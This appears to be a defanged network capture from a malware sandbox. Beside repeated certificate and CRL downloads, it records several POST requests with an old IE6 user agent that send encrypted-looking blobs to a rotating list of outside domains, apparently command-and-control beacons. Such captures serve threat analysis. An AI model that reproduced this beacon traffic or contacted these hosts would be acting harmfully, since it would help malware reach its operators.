.....MJ.!.)a.2"a....n.|_. QD.pOW.....y.X....E..,... {.7zA3x.3......,..
..B....b._.K....uD2A:.qni..uF.... .....@kd.WM...y..^T.4.....%..J...zfk
.`f...........D..j..n3...U....j.._..3..`.['......Vj.%.........0..0...U
.......0....0...U...........0m.. ........a0_.].[0Y0W0U..image/gif0!0.0
... ..............k...j.H.,{..0%.#hXXp://logo.verisign.com/vslogo.gif0
...U.......w.iHG.S.....2v.....0...*.H.............J.....,g{..wc.nL.}..
...5.pOc.$.l..G.;c...v2...w......1!...VZ......Y..c..L.Y.J...(.Z....P8.
l..=..c...!.$9...fF....Ms.}F.=.._b..?..tW .....(....p..............2..
.W.......=...8...\:Oj?..flc...........}..4...ps.{.~..a.E......0.5....U
..K....q........a.8.O..*Z.
....

<<< skipped >>>

GET /msdownload/update/v3/static/trustedr/en/3679CA35668772304D30A5FB873B0FA77BB70D54.crt HTTP/1.1

Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: VVV.download.windowsupdate.com


HTTP/1.1 200 OK
Content-Type: application/x-x509-ca-cert
Last-Modified: Thu, 23 Jul 2015 23:16:35 GMT
Accept-Ranges: bytes
ETag: "80b4b9e9dc5d01:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Content-Length: 1213
Date: Sat, 01 Jul 2017 11:17:03 GMT
Connection: keep-alive
X-CCC: UA
X-CID: 2
0...0..........@..d!..!........0...*.H........0..1.0...U....US1.0...U.
...VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2008
VeriSign, Inc. - For authorized use only1806..U.../VeriSign Universal
Root Certification Authority0...080402000000Z..371201235959Z0..1.0...U
....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..
U...1(c) 2008 VeriSign, Inc. - For authorized use only1806..U.../VeriS
ign Universal Root Certification Authority0.."0...*.H.............0...
......a7^..4.b....XZ.##.`......z.X.8....d...q......M...-s..iq..9<.D
.....MJ.!.)a.2"a....n.|_. QD.pOW.....y.X....E..,... {.7zA3x.3......,..
..B....b._.K....uD2A:.qni..uF.... .....@kd.WM...y..^T.4.....%..J...zfk
.`f...........D..j..n3...U....j.._..3..`.['......Vj.%.........0..0...U
.......0....0...U...........0m.. ........a0_.].[0Y0W0U..image/gif0!0.0
... ..............k...j.H.,{..0%.#hXXp://logo.verisign.com/vslogo.gif0
...U.......w.iHG.S.....2v.....0...*.H.............J.....,g{..wc.nL.}..
...5.pOc.$.l..G.;c...v2...w......1!...VZ......Y..c..L.Y.J...(.Z....P8.
l..=..c...!.$9...fF....Ms.}F.=.._b..?..tW .....(....p..............2..
.W.......=...8...\:Oj?..flc...........}..4...ps.{.~..a.E......0.5....U
..K....q........a.8.O..*Z.
....

<<< skipped >>>

GET /msdownload/update/v3/static/trustedr/en/3679CA35668772304D30A5FB873B0FA77BB70D54.crt HTTP/1.1

Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: VVV.download.windowsupdate.com


HTTP/1.1 200 OK
Content-Type: application/x-x509-ca-cert
Last-Modified: Thu, 23 Jul 2015 23:16:35 GMT
Accept-Ranges: bytes
ETag: "80b4b9e9dc5d01:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Content-Length: 1213
Date: Sat, 01 Jul 2017 11:17:08 GMT
Connection: keep-alive
X-CCC: UA
X-CID: 2
0...0..........@..d!..!........0...*.H........0..1.0...U....US1.0...U.
...VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2008
VeriSign, Inc. - For authorized use only1806..U.../VeriSign Universal
Root Certification Authority0...080402000000Z..371201235959Z0..1.0...U
....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..
U...1(c) 2008 VeriSign, Inc. - For authorized use only1806..U.../VeriS
ign Universal Root Certification Authority0.."0...*.H.............0...
......a7^..4.b....XZ.##.`......z.X.8....d...q......M...-s..iq..9<.D
.....MJ.!.)a.2"a....n.|_. QD.pOW.....y.X....E..,... {.7zA3x.3......,..
..B....b._.K....uD2A:.qni..uF.... .....@kd.WM...y..^T.4.....%..J...zfk
.`f...........D..j..n3...U....j.._..3..`.['......Vj.%.........0..0...U
.......0....0...U...........0m.. ........a0_.].[0Y0W0U..image/gif0!0.0
... ..............k...j.H.,{..0%.#hXXp://logo.verisign.com/vslogo.gif0
...U.......w.iHG.S.....2v.....0...*.H.............J.....,g{..wc.nL.}..
...5.pOc.$.l..G.;c...v2...w......1!...VZ......Y..c..L.Y.J...(.Z....P8.
l..=..c...!.$9...fF....Ms.}F.=.._b..?..tW .....(....p..............2..
.W.......=...8...\:Oj?..flc...........}..4...ps.{.~..a.E......0.5....U
..K....q........a.8.O..*Z.
....

<<< skipped >>>

GET /msdownload/update/v3/static/trustedr/en/3679CA35668772304D30A5FB873B0FA77BB70D54.crt HTTP/1.1

Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: VVV.download.windowsupdate.com


HTTP/1.1 200 OK
Content-Type: application/x-x509-ca-cert
Last-Modified: Thu, 23 Jul 2015 23:16:35 GMT
Accept-Ranges: bytes
ETag: "80b4b9e9dc5d01:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Content-Length: 1213
Date: Sat, 01 Jul 2017 11:17:13 GMT
Connection: keep-alive
X-CCC: UA
X-CID: 2
0...0..........@..d!..!........0...*.H........0..1.0...U....US1.0...U.
...VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2008
VeriSign, Inc. - For authorized use only1806..U.../VeriSign Universal
Root Certification Authority0...080402000000Z..371201235959Z0..1.0...U
....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..
U...1(c) 2008 VeriSign, Inc. - For authorized use only1806..U.../VeriS
ign Universal Root Certification Authority0.."0...*.H.............0...
......a7^..4.b....XZ.##.`......z.X.8....d...q......M...-s..iq..9<.D
.....MJ.!.)a.2"a....n.|_. QD.pOW.....y.X....E..,... {.7zA3x.3......,..
..B....b._.K....uD2A:.qni..uF.... .....@kd.WM...y..^T.4.....%..J...zfk
.`f...........D..j..n3...U....j.._..3..`.['......Vj.%.........0..0...U
.......0....0...U...........0m.. ........a0_.].[0Y0W0U..image/gif0!0.0
... ..............k...j.H.,{..0%.#hXXp://logo.verisign.com/vslogo.gif0
...U.......w.iHG.S.....2v.....0...*.H.............J.....,g{..wc.nL.}..
...5.pOc.$.l..G.;c...v2...w......1!...VZ......Y..c..L.Y.J...(.Z....P8.
l..=..c...!.$9...fF....Ms.}F.=.._b..?..tW .....(....p..............2..
.W.......=...8...\:Oj?..flc...........}..4...ps.{.~..a.E......0.5....U
..K....q........a.8.O..*Z.
....

<<< skipped >>>

GET /msdownload/update/v3/static/trustedr/en/3679CA35668772304D30A5FB873B0FA77BB70D54.crt HTTP/1.1

Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: VVV.download.windowsupdate.com


HTTP/1.1 200 OK
Content-Type: application/x-x509-ca-cert
Last-Modified: Thu, 23 Jul 2015 23:16:35 GMT
Accept-Ranges: bytes
ETag: "80b4b9e9dc5d01:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Content-Length: 1213
Date: Sat, 01 Jul 2017 11:17:19 GMT
Connection: keep-alive
X-CCC: UA
X-CID: 2
0...0..........@..d!..!........0...*.H........0..1.0...U....US1.0...U.
...VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2008
VeriSign, Inc. - For authorized use only1806..U.../VeriSign Universal
Root Certification Authority0...080402000000Z..371201235959Z0..1.0...U
....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..
U...1(c) 2008 VeriSign, Inc. - For authorized use only1806..U.../VeriS
ign Universal Root Certification Authority0.."0...*.H.............0...
......a7^..4.b....XZ.##.`......z.X.8....d...q......M...-s..iq..9<.D
.....MJ.!.)a.2"a....n.|_. QD.pOW.....y.X....E..,... {.7zA3x.3......,..
..B....b._.K....uD2A:.qni..uF.... .....@kd.WM...y..^T.4.....%..J...zfk
.`f...........D..j..n3...U....j.._..3..`.['......Vj.%.........0..0...U
.......0....0...U...........0m.. ........a0_.].[0Y0W0U..image/gif0!0.0
... ..............k...j.H.,{..0%.#hXXp://logo.verisign.com/vslogo.gif0
...U.......w.iHG.S.....2v.....0...*.H.............J.....,g{..wc.nL.}..
...5.pOc.$.l..G.;c...v2...w......1!...VZ......Y..c..L.Y.J...(.Z....P8.
l..=..c...!.$9...fF....Ms.}F.=.._b..?..tW .....(....p..............2..
.W.......=...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 428
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: stecom.nl
Connection: Keep-Alive
Cache-Control: no-cache

j/Xnbm6Br2nFzO01eVmoK9EgwFDu/19KgkAp8GmHFrjDtNZQb/9FYEd7MbuVSdWvKgY4Y74cItON3VlNflf3knKxef8DBlwO5ALKr l3/yF6hXu2t2cqu6oi0M52gXVqgLtvVgu5ZuGqxrgc1/yEamBOcGoIm8v4c5cp5GxWZdaIH 673Luh9d7V3KLcFSQFejSA/rgo3krW5eFRDWD77eidnc/n5QmTTIcG0lr6tr6fTTPjM7S9Hh1glcfTIMo1lu1yblTqDcgPvnMKXScGbVRfg0cY9uONTD65DR8dJktpn1K2FojI1EeB3q5LkdGTwsf7KGGpGpYNphcko6Yqho8mtyyoqitG1HWcv3UyPQWzAmS9rN7nfbpt6gsWXME0V7xzXfbBwxXEArJodLeq1L69Mzr0JV2gJw3YwWECDuw=
HTTP/1.1 301 Moved Permanently
Date: Sat, 01 Jul 2017 11:16:51 GMT
Server: Apache
Location: hXXp://VVV.itgsolutions.nl/
Content-Length: 235
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>301 Moved Permanently</title>.</head
><body>.<h1>Moved Permanently</h1>.<p>The d
ocument has moved <a href="hXXp://VVV.itgsolutions.nl/">here<
/a>.</p>.</body></html>.HTTP/1.1 301 Moved Perman
ently..Date: Sat, 01 Jul 2017 11:16:51 GMT..Server: Apache..Location:
hXXp://VVV.itgsolutions.nl/..Content-Length: 235..Keep-Alive: timeout=
5, max=100..Connection: Keep-Alive..Content-Type: text/html; charset=i
so-8859-1..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.&l
t;html><head>.<title>301 Moved Permanently</title>
;.</head><body>.<h1>Moved Permanently</h1>.<
;p>The document has moved <a href="hXXp://VVV.itgsolutions.nl/"&
gt;here</a>.</p>.</body></html>...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 444
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: fujino-lab.com
Connection: Keep-Alive
Cache-Control: no-cache

jinXGvVTJGdPFX8bXNSnJe6jD82DDhax VcbKihjAGKe2WiKH7bWZioowTwzob4k1xeszo6qtTpImxerBDURlnR2X5u63GeUpXSjiz HRdRfz2KEiCX0HkXX1nmaRd26FN k4/5ObzrervfovQVFf7zt9SANeBcrFgi04jOb/gMJdKgpyP553gJa/0zRQdtIC12QoSZvVXwTBVhzMbobusRQy2h4ZrkfGzgcV/qkn6Twl2hyGoln0EQDZvKTVVxc tolTBOYAYi1LwuIABODdtu2O45GjBHdG8UsngY1HeEzOsVq2Gmgd5ovWS1a5qjRnV4oNvRWBNyMHj1eJDSmdzS3ftb xkHNgHZyAPo6izIi4H0e8FCbm7GK1zpg SMHD8lRiXpoX9zvQ6Hfkle xiti77zTtlwMsEpeIF47glL5DYlfnzY6Xb0Fq5gm
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Server: NetNames
Transfer-Encoding: chunked
Date: Sat, 01 Jul 2017 11:16:48 GMT
Connection: keep-alive
00d23..<!DOCTYPE html>..<html>..<head>..<meta htt
p-equiv="Content-Type" content="text/html; charset=utf-8" />..<m
eta name="robots" content="noodp, noydir" />..<link rel="shortcu
t icon" href="hXXp://185.26.230.136/parked/favicon.ico" type="image/x-
icon" />..<link type="text/css" rel="stylesheet" media="all" hre
f="hXXp://185.26.230.136/parked/reset.css" />..<link type="text/
css" rel="stylesheet" media="all" href="hXXp://185.26.230.136/parked/t
ypography.css" />..<link type="text/css" rel="stylesheet" media=
"all" href="hXXp://185.26.230.136/parked/clean_speednames.css" />..
<script type="text/javascript" src="hXXp://185.26.230.136/parked/mo
dernizr-1.6.min.js"></script>..<title>Speednames | any
domain - anytime - anywhere | Holding Page</title>..<style&g
t;../* custom styles just for parked page that differ from main site *
/..html > body {.. font-size:15px;..}..strong {.. color: #F15F22;
..}..#branding {.. height:120px;..}...mainspeednameslink {.. display
:block;.. margin:1em;.. text-align:center;.. font-size:1.5em;..}..#
page {.. min-height:200px;..}..#page-inner, #navigation-inner, #brand
ing-inner, #header-inner, #footer-inner, #content {.. width:1000px;..
}..</style>..</head>..<body class="front logged-in page
-node one-sidebar i18n-en-UK">..<!--header row-->..<header
id="header">.. <div class="row">.. <div>.. &l
t;div id="header-inner">.. <div id="header-inner-back

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 484
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: denville.ca
Connection: Keep-Alive
Cache-Control: no-cache

P7gKpaimBnVLQvHXa1mUGhuMWHmw7haPXPSHocFljQEmSHAbxUeXfuo9KOvJZbYfQHFBaM1UG4gWxlOV8NGkEfsNbFPh mqdkFisQpGxOQDqreoKJr8mcvfnQs4KYQbBgZdnOMuCs7nnkmyJNzUQx yzU/i8X0wCvsUn37ezWRH4/IIthgCsF2f/KQ5AksJ6oCNwgxymeFMafFy0YSSpULJUbVzxIq91/RLz2Wu2btqgygzWIODsbMWLy00EbuJH KticJf5EsotfDwkdIhVPzWdj XkdK9kKn1245C8SW9ZgYdBTc3PXRJsU/rY3Ir2R0kYd7aduHRcZplaq4cnVi6v9nBwvtceTaOTt2w/eL8JsaqLj8yNHBnDREkH60H9I28QmAokJoHFFdg5Ryi3xF71Bfvt4ZD9Q PBsqHXs6 JuKKkglCPM913Unp 1CKc9rc/WGuWxONo9jpyaYYAReCGiQl 6sFWR/U=
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sat, 01 Jul 2017 11:17:05 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: hXXp://VVV.denville.ca/
<html>..<head><title>301 Moved Permanently</title
></head>..<body bgcolor="white">..<center><h1&
gt;301 Moved Permanently</h1></center>..<hr><cent
er>nginx</center>..</body>..</html>..HTTP/1.1 301
Moved Permanently..Server: nginx..Date: Sat, 01 Jul 2017 11:17:05 GMT
..Content-Type: text/html..Content-Length: 178..Connection: keep-alive
..Location: hXXp://VVV.denville.ca/..<html>..<head><tit
le>301 Moved Permanently</title></head>..<body bgcol
or="white">..<center><h1>301 Moved Permanently</h1&g
t;</center>..<hr><center>nginx</center>..</
body>..</html>....


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 476
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: pcpeds.com
Connection: Keep-Alive
Cache-Control: no-cache

tCRKpKJbYHSi855TFSaofCXdSlUyyKgw9sPOiTneH7rTtCpTcHEpWoJkPwnpK4wHaljiA8llLG8Aj8prVkIab7vRipVO7E/JLcle5YZXgbtj6U9QuxaFcP8Gvl5SIPECt1o5e6 un7nDr2mxO/y9wmqWxOR 34uFQi/f/exYKW0IayvgXDY2f2Eqx0OAqUhd8bvqu bnIswBD4k24XHI6gERuKDag4NaD/aF eaJs5zgQdGhDaCFxjY6p5Hb6eAXZIXKLN/z8PD0cFbh7iK2vny1G s6Qs6gO33Ftk1g1yZHmbcXQBuxwhe6o7DnpROdbVjiNUGDEsAPKEHIMchYH1bwyakCFpXtgU6ZxMUR7s61edFHd4HdYs54dPIklbKA2KUGCuJNLEh3uMf1xNOcR5aDh0Ei5YRwvja5qY5tUnlfMaMmpoijvMRfF05h439kfTujPaxkV4ai O5W3li6OV3qT9Y=
HTTP/1.1 403 Forbidden
Date: Sat, 01 Jul 2017 11:17:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: __cfduid=dd022c290ecdfbdf61d2339df1d3308321498907824; expires=Sun, 01-Jul-18 11:17:04 GMT; path=/; domain=.pcpeds.com; HttpOnly
Cache-Control: max-age=2
Expires: Sat, 01 Jul 2017 11:17:06 GMT
X-Frame-Options: SAMEORIGIN
Server: cloudflare-nginx
CF-RAY: 3778f4ee469d8406-KBP
1596..<!DOCTYPE html>.<!--[if lt IE 7]> <html class="no
-js ie6 oldie" lang="en-US"> <![endif]-->.<!--[if IE 7]>
; <html class="no-js ie7 oldie" lang="en-US"> <![endif]--&
gt;.<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-
US"> <![endif]-->.<!--[if gt IE 8]><!--> <html
class="no-js" lang="en-US"> <!--<![endif]-->.<head>
.<title>Attention Required! | Cloudflare</title>..<meta
charset="UTF-8" />.<meta http-equiv="Content-Type" content="tex
t/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" con
tent="IE=Edge,chrome=1" />.<meta name="robots" content="noindex,
nofollow" />.<meta name="viewport" content="width=device-width,
initial-scale=1,maximum-scale=1" />.<link rel="stylesheet" id="c
f_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" med
ia="screen,projection" />.<!--[if lt IE 9]><link rel="styl
esheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css"
type="text/css" media="screen,projection" /><![endif]-->.<
style type="text/css">body{margin:0;padding:0}</style>.<!-
-[if lte IE 9]><script type="text/javascript" src="/cdn-cgi/scri
pts/jquery.min.js"></script><![endif]-->.<!--[if gte
IE 10]><!--><script type="text/javascript" src="/cdn-cgi/
scripts/zepto.min.js"></script><!--<![endif]-->.<
script type="text/javascript" src="/cdn-cgi/scripts/cf.common.js"&

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 436
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: tenpole.com
Connection: Keep-Alive
Cache-Control: no-cache

E0kue9fjSV70nUXVxi/2tiDUADwNkQOH 8QJ/w9SMY/09NVEAt0ILQTCkdOTy9ApmkLwCbdoWS7iNlOTstiQ Ckx64D5qd8wdSuZB7F7Bc9snIxYfS6APzkIDG8SePXczdit9VqTEdf4CQYo5Qfmg4IA6DdFS3un8TTtKcPpKT1BRIT isPD6BV5PhsJKdPGFWvg1cZPoxlDShMFHKENhGZZkdpeQNKBfbcn7OYOJe1Rf8zE AXXBPzDRXJ2LaXlI1Y6lSH/pejTUvgP71DM83DqB9vKfD8E5OhBGjGIDrpxoKYv4h7eNT1TqKRBbAX7b56KoGd5Yc4aL/kdH4q5ePOhlfeK8fQHiR10Xm3whuNgpLWdZQDbKxlQx5l9xQNE3tCilkhkJb339G957877km6n5NksO39KMCyvXotTOSZIlgLXKD0=
HTTP/1.1 403 Forbidden
Date: Sat, 01 Jul 2017 11:16:39 GMT
Server: Apache
Content-Length: 321
Keep-Alive: timeout=3, max=200
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>403 Forbidden</title>.</head><
body>.<h1>Forbidden</h1>.<p>You don't have permis
sion to access /.on this server.</p>.<p>Additionally, a 40
4 Not Found.error was encountered while trying to use an ErrorDocument
to handle the request.</p>.</body></html>.HTTP/1.1
403 Forbidden..Date: Sat, 01 Jul 2017 11:16:39 GMT..Server: Apache..Co
ntent-Length: 321..Keep-Alive: timeout=3, max=200..Connection: Keep-Al
ive..Content-Type: text/html; charset=iso-8859-1..<!DOCTYPE HTML PU
BLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<titl
e>403 Forbidden</title>.</head><body>.<h1>F
orbidden</h1>.<p>You don't have permission to access /.on
this server.</p>.<p>Additionally, a 404 Not Found.error wa
s encountered while trying to use an ErrorDocument to handle the reque
st.</p>.</body></html>...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 516
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: acmepacificrepairs.com
Connection: Keep-Alive
Cache-Control: no-cache

zEU/cxHT XwLqEcasHHgu2qZzkLPEUwg1ZL3PerWZZS fW5nklXpSx4kRilT8/z45mBfzHK4eMGE hT62TmCA4LhbhHuqGiOg3bF45rPbS7CiJIdQ7haDp45fRs8Fh0PGSy 0kM ie57Uq3iwIg/EPBqC2kC90cvG46xPvT5YgDpT05hl CJXQL52BeegkJbRnDWw28ik56W2mfvwaF4L5V7DWGdPENbKi/wA0e 77PTqJo5cDPs62W6554WxirJAdmGooqObb/Yi84d5x0LpfhkIa35WJ1dP6 gpZYCkfnUU8Asn9VymEvB2N9Jn aXuVzNn3BYWdbpCyAEUE9k4t/dtnLOIDvgY5I36kpXdMGcUTM7LXCoQyAjlGExS1RP5Nt1q2jO/BkjocY1Pgq20KGrq3jit5TsyhrntW0JN7ljitrdiseTQOjUXwlaUU/dTYzmJh5qZFgKvkiflYLHlLK6fzRxQ8ww/uxh3c0kY4bWWxwJCT2i4uK9pCdGfIhBRnaW
HTTP/1.1 410 Gone
Date: Sat, 01 Jul 2017 11:17:14 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8o
Vary: Accept-Encoding
Content-Length: 453
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>410 Gone</title>.</head><body&
gt;.<h1>Gone</h1>.<p>The requested resource<br /&
gt;/<br />.is no longer available on this server and there is no
forwarding address..Please remove all references to this resource.<
;/p>.<hr>.<address>Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ub
untu4.6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8o Server at acm
epacificrepairs.com Port 80</address>.</body></html>
.HTTP/1.1 410 Gone..Date: Sat, 01 Jul 2017 11:17:14 GMT..Server: Apach
e/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.6 with Suhosin-Patch mod_ssl/2.2.
11 OpenSSL/0.9.8o..Vary: Accept-Encoding..Content-Length: 453..Keep-Al
ive: timeout=15, max=100..Connection: Keep-Alive..Content-Type: text/h
tml; charset=iso-8859-1..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2
.0//EN">.<html><head>.<title>410 Gone</title&g
t;.</head><body>.<h1>Gone</h1>.<p>The re
quested resource<br />/<br />.is no longer available on th
is server and there is no forwarding address..Please remove all refere
nces to this resource.</p>.<hr>.<address>Apache/2.2.
11 (Ubuntu) PHP/5.2.6-3ubuntu4.6 with Suhosin-Patch mod_ssl/2.2.11 Ope
nSSL/0.9.8o Server at acmepacificrepairs.com Port 80</address>.&
lt;/body></html>...

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 492
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: krafthaus.com
Connection: Keep-Alive
Cache-Control: no-cache

CZGdxuz2/35gAePI14XcyP/4plJEjrh54IZPk9Gp5k9DcY5x/jcsakvmJX2agd7AL1foA7ifIRzP5BSxgoiIfomswYEk9FSfN7Y6zHr6n3lIHXbRkW0 5cz8g3S7CR9yo 9K DsB5R1cCB06lIG51cfl9/UT9hImwlufZjeyYq6tUk4dHZdgxybrgJybfGb MxzWGismJoSO8KvydaSngGLTGW0EMORL8cdGtsvD9v6yb4rX967pGKT4RaReVRoyTfVydjbi8hOe/V6EZsSZ0 w42JzEyIaU7Ys6lT8WZBD9gBgGhfawXEuE0 cJ12syAmWs4L28BfXQ1eciqOT8H5NIk9p0kR D2EguO1 qBJDtXGRm3 B dXXa0NkQvRsReyK2U6xpHQT1E1XRS2HYs81 CFw6f4Tduk/abUA6IZpgW7v5n5H7Du3yB7o9TYEvc77hz39vG6ISAUV8vO8npwIVJ5wAYvAcnyOngzGQv84=
HTTP/1.1 503 Service Temporarily Unavailable
Date: Sat, 01 Jul 2017 11:17:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: __cfduid=db5b961e430a0bc52919d2a9a8a40c59b1498907836; expires=Sun, 01-Jul-18 11:17:16 GMT; path=/; domain=.krafthaus.com; HttpOnly
X-Frame-Options: SAMEORIGIN
Cache-Control: no-cache
Server: cloudflare-nginx
CF-RAY: 3778f53c06818243-KBP
1099..<!DOCTYPE HTML>.<html lang="en-US">.<head>.  &
lt;meta charset="UTF-8" />. <meta http-equiv="Content-Type" con
tent="text/html; charset=UTF-8" />. <meta http-equiv="X-UA-Comp
atible" content="IE=Edge,chrome=1" />. <meta name="robots" cont
ent="noindex, nofollow" />. <meta name="viewport" content="widt
h=device-width, initial-scale=1, maximum-scale=1" />. <title>
;Just a moment...</title>. <style type="text/css">. ht
ml, body {width: 100%; height: 100%; margin: 0; padding: 0;}. body
{background-color: #ffffff; font-family: Helvetica, Arial, sans-serif;
font-size: 100%;}. h1 {font-size: 1.5em; color: #404040; text-alig
n: center;}. p {font-size: 1em; color: #404040; text-align: center;
margin: 10px 0 0 0;}. #spinner {margin: 0 auto 30px auto; display:
block;}. .attribution {margin-top: 20px;}. @-webkit-keyframes b
ubbles { 33%: { -webkit-transform: translateY(10px); transform: transl
ateY(10px); } 66% { -webkit-transform: translateY(-10px); transform: t
ranslateY(-10px); } 100% { -webkit-transform: translateY(0); transform
: translateY(0); } }. @keyframes bubbles { 33%: { -webkit-transform
: translateY(10px); transform: translateY(10px); } 66% { -webkit-trans
form: translateY(-10px); transform: translateY(-10px); } 100% { -webki
t-transform: translateY(0); transform: translateY(0); } }. .bubbles
{ background-color: #404040; width:15px; height: 15px; margin:2px; bo
rder-radius:100%; -webkit-animation:bubbles 0.6s 0.07s infinite ea

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 488
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: victoria.com.pl
Connection: Keep-Alive
Cache-Control: no-cache

aXoGcAx/W3faAQ/Fdy7fKB9a/9LkCHBLALkcTjPpTPU8m/7M29IZdPlWy591FGkXbdsn0 RGN8q84nAPkEm6fsogJyhWT3zR 9xLeOm5ojHJcH3qZTaldz5iPer wOPF5jF5I0IP4fhmlmOui9sg7rDrsRCLiAKkMNln4noGGP2pWvlEfaZMZQgG/9viRGvQ4Gz7bW/Hb/HrtuAH5FM1Xuv/Fsg0huKwiB8OkZHt 5lk0D9j19RcDHkesvMWO9rrI7VqrEYkawMAHqy092A1i5RM57W4A Vek1mtKVFGbqA/cYSc  E0BAzTES48 wZQUq6z7Dei9VbHIcrqLg39nKASPwbNBz806PfOPey3zFAyFu pRrLY330XsrMqp0DaivV6ilf3V1UJtRodpMRspDakSPHxNYDslwipMEjlIQgD7GfOTQCr2GLD0Td4KEXb0JlypWgw/GwQjN 4P0GSJjkDkZPQenuVACTuYg==
HTTP/1.1 403 Forbidden
Date: Sat, 01 Jul 2017 11:17:07 GMT
Content-Type: text/html
Content-Length: 171
Connection: keep-alive
Server: IdeaWebServer/v0.80
<HTML>.<HEAD>...<TITLE>403 Forbidden</TITLE>..
</HEAD>.<BODY BGCOLOR=#FFFFFF>...<H1>403 Forbidden&l
t;/H1>..You don't have permission to access this document...</BO
DY>.</HTML>.HTTP/1.1 403 Forbidden..Date: Sat, 01 Jul 2017 11
:17:07 GMT..Content-Type: text/html..Content-Length: 171..Connection:
keep-alive..Server: IdeaWebServer/v0.80..<HTML>.<HEAD>...&
lt;TITLE>403 Forbidden</TITLE>..</HEAD>.<BODY BGCOLO
R=#FFFFFF>...<H1>403 Forbidden</H1>..You don't have per
mission to access this document...</BODY>.</HTML>...


GET /cPanelIncCertificationAuthority.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.comodoca.com


HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:17:18 GMT
Content-Type: application/x-pkcs7-crl
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dbdbf7694b7d009902b7407325f3c39981498907838; expires=Sun, 01-Jul-18 11:17:18 GMT; path=/; domain=.comodoca.com; HttpOnly
Last-Modified: Fri, 30 Jun 2017 13:22:12 GMT
ETag: W/"59565084-11200d"
X-CCACDN-Mirror-ID: rmdccacrl10
Cache-Control: public, max-age=14400
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
CF-Cache-Status: HIT
Expires: Sat, 01 Jul 2017 15:17:18 GMT
Server: cloudflare-nginx
CF-RAY: 3778f54987008424-KBP
